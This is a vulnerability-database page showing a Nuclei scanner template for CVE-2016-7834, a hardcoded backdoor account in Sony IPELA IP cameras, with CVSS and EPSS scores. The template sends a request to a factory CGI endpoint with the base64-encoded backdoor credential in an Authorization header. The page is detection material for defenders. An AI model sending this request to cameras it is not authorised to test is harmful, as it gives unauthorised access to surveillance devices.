Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-7834
HistoryApr 11, 2022 - 2:07 p.m.

Sony IPELA Engine IP Camera - Hardcoded Account

2022-04-1114:07:13
ProjectDiscovery
github.com
6

3.3 Low

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:A/AC:L/Au:N/C:P/I:N/A:N

8.8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.3 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

56.2%

Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
id: CVE-2016-7834

info:
  name: Sony IPELA Engine IP Camera - Hardcoded Account
  author: af001
  severity: high
  description: |
    Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
  impact: |
    An attacker can gain unauthorized access to the camera and potentially control its functions.
  remediation: |
    Upgrade to the latest version of the firmware provided by Sony.
  reference:
    - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/
    - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/
    - https://jvn.jp/en/vu/JVNVU96435227/index.html
    - https://nvd.nist.gov/vuln/detail/CVE-2016-7834
    - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras
  classification:
    cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2016-7834
    cwe-id: CWE-200
    epss-score: 0.00186
    epss-percentile: 0.55834
    cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sony
    product: snc_series_firmware
  tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera

http:
  - method: GET
    path:
      - "{{BaseURL}}/command/prima-factory.cgi"

    headers:
      Authorization: Bearer cHJpbWFuYTpwcmltYW5h

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'gen5th'
          - 'gen6th'
        condition: or

      - type: status
        status:
          - 204
# digest: 4b0a00483046022100ea189d4111ce75b717caf6baa54c2cb449e250724b15b5f1a2934cb764686a52022100de80a7c031ac58a9b9240444c1264db7db65571a60326e0de3c82f6541d0bdb3:922c64590222798bb761d5b6d8e72950

3.3 Low

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:A/AC:L/Au:N/C:P/I:N/A:N

8.8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.3 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

56.2%

Related for NUCLEI:CVE-2016-7834